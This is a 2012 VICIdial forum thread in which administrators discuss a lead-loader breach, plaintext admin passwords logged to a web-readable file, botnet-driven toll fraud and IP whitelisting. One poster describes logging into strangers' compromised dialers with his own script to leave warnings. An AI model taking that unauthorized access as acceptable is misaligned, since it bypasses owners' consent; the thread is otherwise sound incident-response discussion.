Email: domedan (at) gmail.com
DomeDan
 
Posts: 1226
Joined: Tue Jan 04, 2011 9:17 am
Location: Sweden

Re: We were hacked: Security vulnerability in lead loader

Postby fibres » Tue Aug 21, 2012 2:14 pm

Hi DomeDan.

Well done in finding this and for adding the campaigns. This is how I found this on 2 of my systems. Interestingly a third system was not affected and was in the same ip range infact just one ip up from one of the infected servers.

I have removed the wwwrun bits and removed the listloader and made the text files uynreadable.

One thing I dont understand is how they got the user password from project_auth.txt? Am I missing something here?

Do they now have the admin account to make changes to my dialer and such? If so this is extremely dangerous as they could potentially add phone ecentsions.

Regards
Vicibox 4.0.3 ISO install.
VERSION: 2.6-393a
BUILD: 130124-1721
Astersik 1.4.44-vici
No Hardware
No other software installed
fibres
 
Posts: 313
Joined: Sun May 20, 2007 3:12 pm
Location: UK

Re: We were hacked: Security vulnerability in lead loader

Postby DomeDan » Wed Aug 22, 2012 4:14 am

Hi, glad you liked it :P

Make sure it was not infected, look for traces in /tmp/ and also in the /vicidial/ directory if some other script is stored there

project_auth_entries.txt:
The user and pass was written to that file when using admin scripts. like this:
"VICIDIAL|GOOD|$date|$PHP_AUTH_USER|$PHP_AUTH_PW|$ip|$browser|$LOGfullname|\n"

It was changed (in some scripts) so only failed attempts was written to the file:
from admin_lists_custom.php: "# 120223-2315 - Removed logging of good login passwords if webroot writable is enabled"

And logging of failed attempts was disabled too:
from svn log: "r1789 | mattf | 2012-02-24 22:43:54 +0100 (fre, 24 feb 2012) | 6 lines
Removed password logging from admin scripts failed login attempts"


Yeah you should consider your password compromised, because my script could login and create a campaign on your system :wink:

So to you and every one else: Change your passwords!
Vicidial Partner. Region: Sweden/Norway.
Does Vicidial installation, configuration, customization, add-ons, CRM implementation, support, upgrading, network-related, pentesting etc. Remote and onsite assistance.
Email: domedan (at) gmail.com
DomeDan
 
Posts: 1226
Joined: Tue Jan 04, 2011 9:17 am
Location: Sweden

Re: We were hacked: Security vulnerability in lead loader

Postby DarknessBBB » Mon Sep 03, 2012 10:21 am

Dear Domedan,
you're a damned hacker :D I've read your "message in the bottle" on one of our servers. Immediately I've checked the 13 servers under my influence, luckily only one of them seems to be hacked.
If you and all the vicidial staff will ever come here in Naples (italy), call me for a great italian dinner.

PS: http://www.exposedbotnets.com/2012/08/s ... ed-in.html
DarknessBBB
 
Posts: 328
Joined: Mon Jul 16, 2007 10:14 am

Re: We were hacked: Security vulnerability in lead loader

Postby DomeDan » Mon Sep 03, 2012 3:37 pm

I'll send you a message if I happen to get the opportunity to go to Naples :)

and regarding the botnet, as you can see in my pastebin there was 168 normal users at that point and after I've been through all the ip-adresses there were about 150 unique ones,
I think I was able to inform almost every one with my script.
Before I was banned from their irc server (the fourth time) there was about 30 normal users left (and that was a while ago) so I guess I managed to cripple the botnet pretty good :)

And btw, that comment on the blogpost you linked to: "These guys are morons, instead of trying to kick off people they should fix their security, adios idiots. ~Cookie "
If Cookie is talking about my actions when he wrote "kick off people" then I would like to point out that I'm not part of the Vicidial crew!
I've done this totally individual just because I think its interesting.

8)
Vicidial Partner. Region: Sweden/Norway.
Does Vicidial installation, configuration, customization, add-ons, CRM implementation, support, upgrading, network-related, pentesting etc. Remote and onsite assistance.
Email: domedan (at) gmail.com
DomeDan
 
Posts: 1226
Joined: Tue Jan 04, 2011 9:17 am
Location: Sweden

Re: We were hacked: Security vulnerability in lead loader

Postby fibres » Mon Nov 05, 2012 6:15 am

Hi Guys

Just an update. Be wary if you were hacked by these guys. One of our customers was hacked. We re-installed their system and changed all passwords, etc.

However there was 1 extension that the customer had created which was not in the same scheme as others so was missed when passwords were changed.

Over last 10 days someone has registered to this extension and made a lot of calls to a Quasi mobile number. Looks like a mobile number but belongs to some dodgy British Telco and I guess they make money from this.

So keep an eye on your systems.
Vicibox 4.0.3 ISO install.
VERSION: 2.6-393a
BUILD: 130124-1721
Astersik 1.4.44-vici
No Hardware
No other software installed
fibres
 
Posts: 313
Joined: Sun May 20, 2007 3:12 pm
Location: UK

Re: We were hacked: Security vulnerability in lead loader

Postby williamconley » Mon Nov 05, 2012 11:04 am

Which is why we go "whitelist" with all clients (even those who object at first ...). Can't register to a sip account if you can't get a packet to the server in question ...
Vicidial Installation and Repair, plus Hosting and Colocation
Newest Product: Vicidial Agent Only Beep - Beta
http://www.PoundTeam.com # 352-269-0000 # +44(203) 769-2294
williamconley
 
Posts: 20258
Joined: Wed Oct 31, 2007 4:17 pm
Location: Davenport, FL (By Disney!)

Re: We were hacked: Security vulnerability in lead loader

Postby fibres » Mon Nov 05, 2012 2:30 pm

Hi William

Thanks for the response.

I have been thinking along those lines recently to be on safe side.

What do you charge to set that up? Or is it something you provide instructions for anyone to do now?

Regards
Vicibox 4.0.3 ISO install.
VERSION: 2.6-393a
BUILD: 130124-1721
Astersik 1.4.44-vici
No Hardware
No other software installed
fibres
 
Posts: 313
Joined: Sun May 20, 2007 3:12 pm
Location: UK

Re: We were hacked: Security vulnerability in lead loader

Postby williamconley » Mon Nov 05, 2012 3:51 pm

While I hesitate to put this directly on the vicidial wiki, I'll put it here for now:

http://www.viciwiki.com/index.php/Whitelist

And if I get permission to move it to the Vicidial wiki, I'll move it later. Maybe Kumba will make this an option during installation on Vicibox 4.1 :)
Vicidial Installation and Repair, plus Hosting and Colocation
Newest Product: Vicidial Agent Only Beep - Beta
http://www.PoundTeam.com # 352-269-0000 # +44(203) 769-2294
williamconley
 
Posts: 20258
Joined: Wed Oct 31, 2007 4:17 pm
Location: Davenport, FL (By Disney!)

Re: We were hacked: Security vulnerability in lead loader

Postby fibres » Mon Nov 05, 2012 5:13 pm

Hi

Thanks for that.

Dont you have a script that locks a system down until someone on the customers site visits a hidden webpage and log's into system to allow the site through firewall?

Regards
Vicibox 4.0.3 ISO install.
VERSION: 2.6-393a
BUILD: 130124-1721
Astersik 1.4.44-vici
No Hardware
No other software installed
fibres
 
Posts: 313
Joined: Sun May 20, 2007 3:12 pm
Location: UK

Re: We were hacked: Security vulnerability in lead loader

Postby williamconley » Mon Nov 05, 2012 5:51 pm

Yep. But that one still costs $$. We'll have to sell a few more copies before it's paid for and we can donate it to the community. I will say, however, that there are a large quantity of them available, ours just happens to fit nicely into Vicidial. I think another 4 or 5 sales will allow us to release it.
Vicidial Installation and Repair, plus Hosting and Colocation
Newest Product: Vicidial Agent Only Beep - Beta
http://www.PoundTeam.com # 352-269-0000 # +44(203) 769-2294
williamconley
 
Posts: 20258
Joined: Wed Oct 31, 2007 4:17 pm
Location: Davenport, FL (By Disney!)


Return to Support

Who is online

Users browsing this forum: Google [Bot] and 142 guests